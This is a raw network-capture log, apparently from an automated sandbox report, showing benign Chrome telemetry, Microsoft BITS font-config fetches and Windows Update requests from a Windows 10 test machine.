                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73
                                                                                                                                                                                                                                                                                        Data Ascii: e=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72
                                                                                                                                                                                                                                                                                        Data Ascii: pe.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)r
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28
                                                                                                                                                                                                                                                                                        Data Ascii: +9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0||e>1114111||e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        5192.168.2.449748142.250.186.464437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:10 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: play.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Content-Length: 913
                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:10 UTC913OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 33 33 39 33 36 38 30 32 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                        Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731339368020",null,null,null,
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:10 UTC942INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                        Set-Cookie: NID=519=rIfGDtm09Y0XeV4yTVj9DsMBiYz_AxqpchuLJ8Q8o9HLQiHF-VFtIDaaFeKsQg9Ut-IL9oirDKsPMx87FqBj05S_1cR8G4b305gondiFBE4iLxth7IbmUvgWAk8r_UYwbo_RJsZ1ci2jSe3t5Md5iq9vAyClphbq3ktfRn0twTnAqcHuweT8oD3r; expires=Tue, 13-May-2025 15:36:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:10 GMT
                                                                                                                                                                                                                                                                                        Server: Playlog
                                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 15:36:10 GMT
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:10 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        6192.168.2.449750184.28.90.27443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:11 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:11 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=4164
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:11 GMT
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        X-CID: 2


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        7192.168.2.449754142.250.186.464437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC928OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: play.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Content-Length: 918
                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                        Cookie: NID=519=rIfGDtm09Y0XeV4yTVj9DsMBiYz_AxqpchuLJ8Q8o9HLQiHF-VFtIDaaFeKsQg9Ut-IL9oirDKsPMx87FqBj05S_1cR8G4b305gondiFBE4iLxth7IbmUvgWAk8r_UYwbo_RJsZ1ci2jSe3t5Md5iq9vAyClphbq3ktfRn0twTnAqcHuweT8oD3r
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC918OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 33 33 39 33 36 39 36 33 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                        Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731339369630",null,null,null,
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC950INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                        Set-Cookie: NID=519=R90UwZ6GHC_l2gRHWluYVGQYorHG0wITz_Y2Eq96IrlS7pjD33h6JyytvZXvw3gwTuygiW-dGTiO6Zt8AuLaW6w5u8wpN8pirxN0XcFOgdJ4uUrS8TAi6Y-8diOCiMZFPfLmxal_BFGXLuP69ecJ92VEzg3C8hd7-YM7AGg5iKfJw7a8VGJ29NZDwYIpMcBP; expires=Tue, 13-May-2025 15:36:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:12 GMT
                                                                                                                                                                                                                                                                                        Server: Playlog
                                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 15:36:12 GMT
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        8192.168.2.449755184.28.90.27443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=4160
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:12 GMT
                                                                                                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:12 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        9192.168.2.44975652.149.20.212443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:16 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xw22vO9TWLLn8Hf&MD=UgM+Sxz6 HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                        MS-CorrelationId: 335c6840-9c0b-41a6-baae-7769b3825f29
                                                                                                                                                                                                                                                                                        MS-RequestId: df96c956-422d-4ebc-a698-cedd1e431f64
                                                                                                                                                                                                                                                                                        MS-CV: eV6lSjUxbE2n+czp.0
                                                                                                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:15 GMT
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Length: 24490
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:16 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        10192.168.2.44976352.149.20.212443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:54 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xw22vO9TWLLn8Hf&MD=UgM+Sxz6 HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:54 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                        MS-CorrelationId: a30c318b-e423-47c2-a232-cdebedb069c5
                                                                                                                                                                                                                                                                                        MS-RequestId: ce665f1c-88c6-4a85-84a9-484d64b1fa86
                                                                                                                                                                                                                                                                                        MS-CV: /ty/YBBeY0SgRJoz.0
                                                                                                                                                                                                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:54 GMT
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Length: 30005
